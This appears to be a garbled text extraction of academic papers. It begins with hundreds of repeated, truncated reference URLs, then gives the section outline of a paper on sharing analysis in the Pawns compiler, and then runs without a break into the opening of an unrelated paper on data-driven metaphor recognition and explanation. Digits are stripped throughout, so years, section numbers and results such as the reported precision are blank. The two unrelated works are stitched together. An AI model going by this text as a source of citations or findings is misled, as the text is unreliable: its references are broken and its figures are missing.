https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://dx.doi.org/ . / . http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. sharing analysis in the pawns compiler introduction an overview of pawns the low level view the high level view core pawns the abstract domain the sharing analysis algorithm example discussion related work conclusion acknowledgements references data-driven metaphor recognition and explanation data-driven metaphor recognition and explanation hongsong li microsoft research asia hongsli@microsoft.com kenny q. zhu shanghai jiao tong university kzhu@cs.sjtu.edu.cn haixun wang google research haixun@google.com abstract recognizing metaphors and identifying the source-target mappings is an important task as metaphorical text poses a big challenge for machine reading. to address this problem, we automatically acquire a metaphor knowledge base and an isa knowledge base from billions of web pages. using the knowledge bases, we develop an inference mechanism to rec- ognize and explain the metaphors in the text. to our knowledge, this is the first purely data- driven approach of probabilistic metaphor ac- quisition, recognition, and explanation. our results shows that it significantly outperforms other state-of-the-art methods in recognizing and explaining metaphors. introduction a metaphor is a way of communicating. it enables us to comprehend one thing in terms of another. for example, the metaphor, juliet is the sun, allows us to see juliet much more vividly than if shakespeare had taken a more literal approach. we utter about one metaphor for every ten to twenty-five words, or about six metaphors a minute (geary, ). specifically, a metaphor is a mapping of concepts from a source domain to a target domain (lakoff and johnson, ). the source domain is often con- crete and based on sensory experience, while tar- get domain is usually abstract. two concepts are connected by this mapping because they share some common or similar properties, and as a result, the meaning of one concept can be transferred to an- other. for example, in “juliet is the sun,” the sun is the source concept while juliet is the target concept. one interpretation of this metaphor is that both con- cepts share the property that their existence brings about warmth, life, and excitement. in a metaphor- ical sentence, at least one of the two concepts must be explicitly present. this leads to three types of metaphors: . juliet is the sun. here, both the source (sun) and the target (juliet) are explicit. . please wash your claws before scratching me. here, the source (claws) is explicit, while the target (hands) is implicit, and the context of wash is in terms of the target. . your words cut deep. here, the target (words) is explicit, while the source (possibly, knife) is implicit, and the context of cut is in terms of the source. in this paper, we focus on the recognition and ex- planation of metaphors. for a given sentence, we first check whether it contains a metaphoric expres- sion (which we call metaphor recognition), and if it does, we identify the source and the target con- cepts of the metaphor (which we call metaphor ex- planation). metaphor explanation is important for understanding metaphors. explaining type and metaphors is particularly challenging, and, to the best of our knowledge, has not been attempted for nominal concepts before. in our examples, know- ing that life and hands are the target concepts avoids the confusion that may arise if source concepts sun and claws are used literally in understanding the sen- tences. this, however, does not mean that the source nominal concepts are those represented by noun phrases. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. concept is a useless embellishment. in the rd sen- tence, knowing that words is mapped to knife en- ables the system to understand the emotion or the sentiment embedded in the text. this is the reason why metaphor recognition and explanation is impor- tant to applications such as affection mining (smith et al., ). it is worth noting that some prefer to consider the verb “cut”, rather than the noun “words”, to be metaphoric in the rd sentence above. we instead concentrate on nominal metaphors and seek to ex- plain source-target mappings in which at least one domain is a nominal concept. this is because verbs usually have nominal arguments, as either subject or object, thus explaining the source-target mapping of the nominal argument covers most, if not all, cases where a verb is metaphoric. in order for machines to recognize and explain metaphors, it must have extensive human knowl- edge. it is not difficult to see why metaphor recog- nition based on simple context modeling (e.g., by selectional restriction/preference (resnik, )) is insufficient. first, not all expressions that violate the restriction are metaphors. for example, i hate to read heidegger violates selectional restriction, as the context (embodied by the verb read) prefers an object other than a person (heidegger). but, heideg- ger is not a metaphor but a metonymy, which in this case denotes heidegger’s books. second, not every metaphor violates the restriction. for example, life is a journey is clearly a metaphor, but selectional re- striction or preference is helpless when it comes to the isa context. existing approaches based on human-curated knowledge bases fall short of the challenge. first, the scale of a human-curated knowledge base is of- ten very limited, which means at best it covers a small set of metaphors. second, new metaphors are created all the time and the challenge is to rec- ognize and understand metaphors that have never been seen before. this requires extensive knowl- edge. as a very simple example, even if the machine knows sports cars are fire engines is a metaphor, it still needs to know what is a sports car before it can understand my ferrari is a fire engine is also a metaphor. third, existing human-curated knowl- edge bases (including metaphor databases and the wordnet) are not probabilistic. they cannot tell how typical an instance is of a category (e.g., a robin is a more typical bird than a penguin), or how popu- lar an expression (e.g., a breath of fresh air) is used as a source concept to describe targets in another concept (e.g., young girls). unfortunately, without necessary probabilistic information, not much rea- soning can be performed for metaphor explanation. in this paper, we address the above challenges. we start with a probabilistic isa knowledge base of many entities and categories harnessed from billions of web documents using a set of strict syntactic pat- terns known as the hearst patterns (hearst, ). we then automatically acquire a large probabilistic metaphor database with the help of both syntactic patterns and the isa knowledge base (section ). finally we combine the two knowledge bases and a probabilistic reasoning mechanism for automatic metaphor recognition and explanation (section ). this paper makes the following contributions: . to our knowledge, we are the first to intro- duce the metaphor explanation problem, which seeks to recover missing or implied source or target concepts in an implicit metaphor. . this is the first big-data driven, unsupervised approach for metaphor recognition and expla- nation. one of the benefits of leveraging big data is that the knowledge we obtain is less bi- ased, has great coverage, and can be updated in a timely manner. more importantly, a data driven approach can associate with each piece of knowledge probabilities which are not avail- able in human curated knowledge but are indis- pensable for inference and reasoning. . our results show the effectiveness both in terms of coverage and accuracy of our approach. we manage to acquire one of the largest metaphor knowledge bases ever existed with a preci- sion of %. the metaphor recognition accu- racy significantly outperforms the state-of-the- art methods (section ). related work existing work on metaphor recognition and interpre- tation can be divided into two categories: context- oriented and knowledge-driven. the approach pro- posed in this paper touches on both categories. . context-oriented methods some previous work relies on context to differentiate metaphorical expressions from literal ones (wilks, ; resnik, ). the selection restriction the- ory (wilks, ) argues that the meaning of an ex- pression is restricted by its context, and violations of the restriction imply a metaphor. resnik ( ) uses kl divergence to measure the selectional preference strength (sps), i.e., how strongly a context restricts an expression. although he did not use this measure directly for metaphor recognition, sps (and also a related measure called the selection association) is widely used in more re- cent approaches for metaphor recognition and inter- pretation (mason, ; shutova, ; shutova et al., ; baumer et al., ). for example, ma- son ( ) learns domain-specific selectional prefer- ences and use them to find mappings between con- cepts from different domains. shutova ( ) de- fines metaphor interpretation as a paraphrasing task. the method discriminates between literal and fig- urative paraphrases by detecting selectional prefer- ence violation. the result of this work has been compared with our approach in section . shutova et al. ( ) identify concepts in a source domain of a metaphor by clustering verb phrases and filter- ing out verbs that have weak selectional preference strength. baumer ( ) uses semantic role labeling techniques to calculate selectional preference on se- mantic relations instead of grammatic relations for metaphor recognition. a less related but also context-based work is analogy interpretation by relation mapping (turney, ). the problem is to generate mapping between source and target domains by computing pair-wise co-occurrences for different contextual patterns. our approach uses selectional restriction when enriching the metaphor knowledge base, and adopts context preference when explaining type and metaphors by focusing on the nearby verbs of a po- tential source or target concept. . knowledge-driven methods a growing number of works use knowledge bases for metaphor understanding (martin, ; narayanan, ; barnden et al., ; veale and hao, ). midas (martin, ) checks if a sen- tence contains an expression that can be explained by a more general metaphor in a human-curated metaphor knowledge base. att-meta (barnden et al., ) performs metaphor reasoning with a human-curated metaphor knowledge base and first order logic, and it focuses on affection detection (smith et al., ; agerri, ; zhang, ). kr- ishnakumaran and zhu ( ) use the isa relation in wordnet (miller, ) for metaphor recognition. gedigian et al. ( ) use framenet (fillmore et al., ) and probank (kingsbury and palmer, ) to train a maximum entropy classifier for metaphor recognition. trofi (birke and sarkar, ) rede- fines literal and non-literal as two senses of the same verb and provide two senses with seed sentences from human-curated knowledge bases like word- net, known metaphor and idiom sets. for a given sentence containing target verb, it compares the sim- ilarity of the sentence with two seed sets respec- tively. if the sentence is closer to the non-literal sense set, the verb is recognized as non-literal usage. while the above work all relies on human cu- rated data sets or manual labeling, veale and hao ( ) introduced the notion of talking points which are figurative properties of noun-based concepts. for example, the concept “hamas” has the follow- ing talking points: is islamic:movement and gov- erns:gaza strip. they automatically constructed a knowledge base called slip net from wordnet and web corpus. concepts that are connected on the slip net can “slip” to one another and are hence considered related in a metaphor. however, straight- forward traversal on the slip net can become com- putationally impractical and the authors did not elab- orate on the implementation details. in practice, the knowledge acquired in this paper is much larger but our algorithms are computationally more feasible. obtaining probabilistic knowledge in this section, we describe how to use a large, general-purpose, probabilistic isa knowledge base Γh to create a probabilistic metaphor dataset Γm. Γh contains isa pairs as well as scores associated with each pair. the metaphor dataset Γm contains metaphors of the form: (source, target), and a weight function pm that maps a metaphor pair to a probabilistic score. the purpose of creating Γh is to help clean and expand Γm, and to perform proba- bilistic inference for metaphor detection. . isa knowledge Γh Γh , a general-purpose, probabilistic isa knowl- edge base, was previously constructed by wu et al.( ). Γh contains isa relations in the form of (x,hx), a pair of hyponym and hypernym, for exam- ple, (steve ballmer, ceo of it companies), and each pair is associated with a set of probabilistic scores. two of the most important scores are known as typ- icality: p(x|hx), the typicality of 